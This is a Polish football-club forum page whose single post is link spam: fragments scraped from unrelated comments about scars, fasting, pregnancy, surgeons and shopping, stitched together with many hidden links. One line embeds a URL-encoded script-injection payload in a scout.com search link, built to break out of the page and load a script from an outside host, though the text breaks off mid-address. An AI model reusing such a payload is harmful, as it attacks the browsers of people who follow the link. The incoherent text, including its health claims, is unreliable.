Obecny czas to ro 3:43, 22 Lis 2017 | Zaloguj si, by sprawdzi wiadomoci
Zobacz posty bez odpowiedzi
Forum www.dallastychy.fora.pl Strona GwnaForum www.dallastychy.fora.pl Strona Gwna
Uytkownicy Grupy Rejestracja Zaloguj

Nie jedz owoców!
Napisz nowy temat   Odpowiedz do tematu    Forum www.dallastychy.fora.pl Strona Gwna » I Liga
Zobacz poprzedni temat | Zobacz nastpny temat  
Autor Wiadomo
Juukla




Doczy: 25 Sty 2014
Posty: 749
Przeczyta: 0 tematw

Ostrzee: 0/5
Skd: Finland

PostWysany: ro 6:27, 09 Kwi 2014    Temat postu: Nie jedz owoców!

Jest to co najmniej niepowazne.
[link widoczny dla zalogowanych]
jam mam blizne na ramieniu i zachodzi troche nad przed ramie ma ok 15 cm, i mam ją brzydka bo mam bliznowca i podczas operacji wyciagania srub i blachy wytną mi tego bliznowca i zrobia ladny kosmetyczny szew, lekarz nie daje mi gwarancji ze nie bede miala znowu tego bliznowca ale ja mysle ze bedzie ok, po wtedy mialam reke w gipsie i moze dlatego sie tak brzydko zagoilo, no i wlasnie po tej operacji mam chodzic na lasery i smarowac masciami , pierwsze slysze ze nie wolno A ja muszę jeszcze w kuchni podziałać.
nie ma cudów niestety, przerwania ciągłości skóry nie da się bez śladu naprawić, blizna będzie zawsze, mniejsza, większa, ale będzie
[link widoczny dla zalogowanych]
http://www.scout.com/search.aspx?siteSearch=S cout.com&q=%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E% 3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2
mam pytanie
[link widoczny dla zalogowanych]
ciesze sie nawet ze mu sie wczepil wie czemu sie boje teraz.
Mocne więzi zostawiłam w Polsce i bardzo mi ich brakuje W sensie towarzyskim jest cienko, mieszkam w malutkiej miejscowości, więc wiesz jak to jest.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

Piszcie teraz jak sobie radzicie z odzywianiem po glodowce. [link widoczny dla zalogowanych] Nawet jeśli kłamie i wymyśla.
Keira jest spoko bardzo podobała mi sie w Love accually i Dumie i uprzedzeniu Oba leki brałam na dobę przed zabiegiem, Exacyl już mogę odstawić, bo krwawiłam tylko po zabiegu, ale nawet nosa porządnie wysmarkać się nie dało żeby nie krwawiło dziąsło Żeby zapobiec nawrotom choroby, razem z kobietą musi się leczyć jej partner. Skacze zajączek po lesie i życzenia Wam niesie, przez pisanki przeskakuje, Alleluja wykrzykuje! Dopiero teraz sobie z tego zdalam sprawe. [link widoczny dla zalogowanych]
ja zresztą nie wyobrazam sobie roku zycia bez niego!!Dlatego mam nadziję go sciągnąc w niedługim czasie z gory dziekuje za odp pozdrawiam Tym razem rana się zagoiła ale paznokieć odrósł krzywo i teraz wrasta regularnie. nadał świetny styl mojej fryzurze ale on jest na recepte. 2. Kilka miesięcy temu byłam na diecie kopenhaskiej i myślałam, że skoro dałam radę głodówka będzie bułką z masłem.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

plus znajomosc angielskiego mile widziana,albo nalezy przekwalifikowac sie (nie zawsze warto).W sumie jest tez pelno mlodych wlochow po Bocconi,Cattolica i innych uczelniach,ktorzy sa chetniej szukani,a wcale nie czekaja ich super zarobki.We wloszech jest silny nacjonalizm w przyznawaniu pracy.oprocz znajomosci.ale nie wiem,jakie masz oczekiwania,dlatego-tobie wybor.trzymaj sie cieplutko i sie nie zrazaj.
[link widoczny dla zalogowanych]
zmniejszającego zagrożenie.
ojjjjj szkoda wczorajszego meczu, ale coz taka pilka...
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

A teraz te odrosty. [link widoczny dla zalogowanych] Po wydłużeniu nogi wszystko ładnie się zagoilo a po rozkreceniu drut spadł na dół przeciol skórę :/
ja byłam zdecydowana ale nie ma słowa o tej pani dr w interenecie, zero opini zero zdjęc jej prac wiec spanikowałam.... ja zazwyczaj ocet jabłkowy + sól morska, najszybsza mikstura dla mnie to wszystko jest czasochłonne, bo trzeba czekać az woda wystygnie, przygotować wszystko, posprzątać później, ok 1,5 godziny mi z tym wszystkim zchodzi... NIezawzse wysoka prolaktyna przeszkadza w zajsciu w ciaze. kazda z nas pisze,to co wie,z czym sie spotkala,ona pytala o rade wiec jej dajemy,albo raczej przyklady wymieniamy,zgadza sie,ze kazdy zwiazek jest ryzykiem,ostatnio sie dowiedzialam,ze Krzysztof Ibisz sie rozszedl ze swoja zona,w szoku bylam,taka fajna parka byli,dlatego w zyciu nie ma gwarancji,ale ogolnie o turkach slyszy sie duzo wiecej zlych rzeczy,jak o Polakach ...No właśnie, dlaczego? [link widoczny dla zalogowanych]
hej;] mam pytanie kiedy najlepiej pic herbatę?? m.kolodynski prowadzil rower blazeja i wystepowal tez w starych odc. Witam wszystkie Mamusie i przyszle Mamusie...7.03.08 mialam ostatnia @,a nastepna miala byc 3.04.08,ale ja nie wiem dlaczego ``czulam``,ze jestem w ciazy...31.03.08 zrobilam test,ktory pokazal wynik pozytywny Dla wiekszej pewnosci zrobilam drugi i tez wyszedl pozytywny.Potem jeszcze robilam testy co pare dni i w sumie zrobilam ich...10!Wszystkie sa pozytywne Mam podobne objawy tzn.bola mnie piersi i delikatnie podbrzusze :/ I wlasnie tego sie obawiam...Wedlug obliczen to jest koniec 5 tygodnia ciazy.W poniedzialek czyli za 3 dni mam pierwsza wizyte u Pani ginekolog.Tak strasznie sie boje czy wszystko jest ok Zwariowac mozna...Pisze tu,bo widze,ze nie tylko ja sie denerwuje.Czy mozna sobie jakos pomoc???Zanim pojde do lekarza...Pozdrawiam serdecznie:* Nie chciałam go spotkać. choć nie wiem jak to w innych liniach lotniczych. A nomoże to i było znieczulenie Kasioolka hehehe... ŻE NAJLEPSZY TO EXPANDER NA PIŁSUDZKIEGO BEZ APELACYJNIE - CENY
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
Polecam Dr Jarlinskiego ,konsultacje ma w srode lub w czwartek w poradni chirurgi plastycznej przy szpitalu kolejowym ,swietny fachowiec i bardzo naturalny nie jak dr Myczkowski \gburowaty\ do pacjentow ,taki ma styl zachowania sie .
hep--- ja tez tak mialam i mam tez koslawos i skrot 3cm- teraz bede miala ilizarova
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

jak zreszta same wiecie.
[link widoczny dla zalogowanych]
a awidons moj jest taka co o tym myslicie 133,00
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
dziewczynki oj co ja przeszlam dzis w szpitalu, nie chciala mnie oddzialowa przyjac ze wzgledu na swieto, ide wiec w piatek i zostaje na badania, w poniedzialek ma byc planowo zabieg ufff, bedzie!
Jeśli chodzi o poradę stylisty to usłyszałam dwa zdania i to od niechcenia.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

Naprawdę fajne buty, możecie znaleźć na stronie producenta olbrzymich butówwww.roberto.com.pl . [link widoczny dla zalogowanych] dziś niezauważona poszła i ukardkiem zjadła kocią karmę z miski jedno może dwa chrupki zanim ją zabrałam , no taki czort mały że hej ;-/
Moj zrost tez nie byl ostatnio zachwycajacy mam nadzieje ze za te 2tyg bedzie juz cale zrosniete i naprawde mi to sciagna tak jak powiedzieli. Hmmm może do końca nie są jeszcze zależy jakie jest nasilenie tego zauroczenia!!! Moja ostatnia ofiara usłyszała głośny krzyk (niestety sąsiedzi też), kiedy stojąc na krześle usiłowałam zatłuc ją w kącie łazienki - cud, że w ogóle się odważyłam to zrobić. metr pięćdziesiąt na szczudłach i w cylindrze...chociaż w jej wypadku cylinder można zamienic na wielką fryzure!! Jeśli nie poznasz tych metod i siebie nie przekonasz to ciągle będziesz w tym tkwiła [link widoczny dla zalogowanych]
20 lat temu (teraz mam 36) i za nic w świecie z tego nie zrezygnuję ;P nawet kosztem zespołu Havelocka Ellisa ;D a to z tej prostej przyczyny, że żaden mężczyzna nie jest technicznie w stanie dać tyle frajdy, co prysznic To z prysznicem odkryłam co to jest orgazm, a później co to orgazm wielokrotny - i właśnie o tym chce wspomnieć - pisząc wielokrotny nie mam na myśli 2 czy 3 razów ... Mam jeszcze jeden problem, o którym nie pisałam...choroba-schorzenie tzw. czy to wgl ma za zadanie uporanie sie z kolorem i zapachem moich uplawow? No i czy rzeczywiscie ten Norprolac nie ma takich skutków ubocznych? Pozdrawiam Ja szukam ciągle kogoś, ale przez internet i nie idzie mi to łatwo. Marcin Dorociński
głupie....
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
Wzorost twój jest naprawdę duży.
[link widoczny dla zalogowanych]

stopki bo nie warto czesciej jak raz na tydzien.
[link widoczny dla zalogowanych]
Mam mase energii nie chodze nieprzytomna i poprawil mi sie wzrok.
[link widoczny dla zalogowanych]
oczywiscie dam znac
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]

Jeśli ja również mogę prosić o zdjęcia to proszę [link widoczny dla zalogowanych] Zapewne teraz napiszesz , że napisanie tego tekstu zajęło mi dwie godziny , ale tak nie jest BO PISZĘ GO OD WCZORAJ!!!!!!!!!!
Aga ,jednym słowem 25-ty to nasz dzień.Trzymaj się,będzie dobrze!!!!Też mam byćpp odwójnie u smiechnięta od tego dnia własnie.Pozdrawiam!!! ja studiuje na Akademii Medycznej Zdrowie Publiczne,a teraz bede tez zdawac jeszcze na połoznictwo,moim zdaniem nigdy nie wiemy,który zawód będzie dobry w przyszłości...Ja akurat wybieram ten kierunek z zainteresowania Buuuu to ja wole glodoweczke a pozniej stopniowo warzywa w tym w swoim czasie straczkowe i ziemniaczki :] i tak cię nie lubieeee....!!!!!! Postanowilem wiec wybrac sie do chirurga. [link widoczny dla zalogowanych]
na razie wyglada dobrze ale to chyba dlatego ze to pierwszy dzien. Co robię nie tak? dosc zaskakujacy, i wtedy dopiero widze ten syf . skoczylam go brac przedwczoraj wieczorem czyli w czwartek a dzis w sobote zauwazylam brazowy sluz, czy to normalne??????????????????? wątroba nie oczyści się wodą bo jej nie prztwarza, jeżeli tylko interesujesz sie zdrowym trybem życia to polecam ogromnie, White Christmas i na łozko!!!
Przewaznie wieczorem????
[link widoczny dla zalogowanych]
w końcu zebrało sie sporo przedmiotów, które łamią, tę bvarwe
Czy ktoś z was kupował kiedys orbitra we Wrocku na Bielanach w Decalthlonie?Maja fajny sprzęt.Ktos powiedział,że orbitrek z info MADE IN CHINA jest podróbą.Nie prawda.Wszystkie orbitrki MADE IN CHINA,ponieważ chińczycy znają się na rzeczy.Nawet Ketteler jest produkowany i wykonany w Chinach.Nie sugerujcie się tym przy zakupie sprzetu.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
Witam poszukuję polskiego lekarza który poprowadzi moją ciążę kiepsko u mnie z niemieckim wiec szukam kogoś kto mowi po polsku pomocy !Q!!!!!
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]


Post zosta pochwalony 0 razy
...
Zobacz profil autora
Powrt do gry
Napisz nowy temat   Odpowiedz do tematu    Forum www.dallastychy.fora.pl Strona Gwna » I Liga
Wywietl posty z ostatnich:   
 
 
Wszystkie czasy w strefie EET (Europa)
Skocz do:  

Strona 1 z 1


Nie moesz pisa nowych tematw
Nie moesz odpowiada w tematach
Nie moesz zmienia swoich postw
Nie moesz usuwa swoich postw
Nie moesz gosowa w ankietach


fora.pl - za wasne forum dyskusyjne za darmo
Powered by phpBB © 2001, 2002 phpBB Group

Theme created OMI of Kyomii Designs for BRIX-CENTRAL.tk.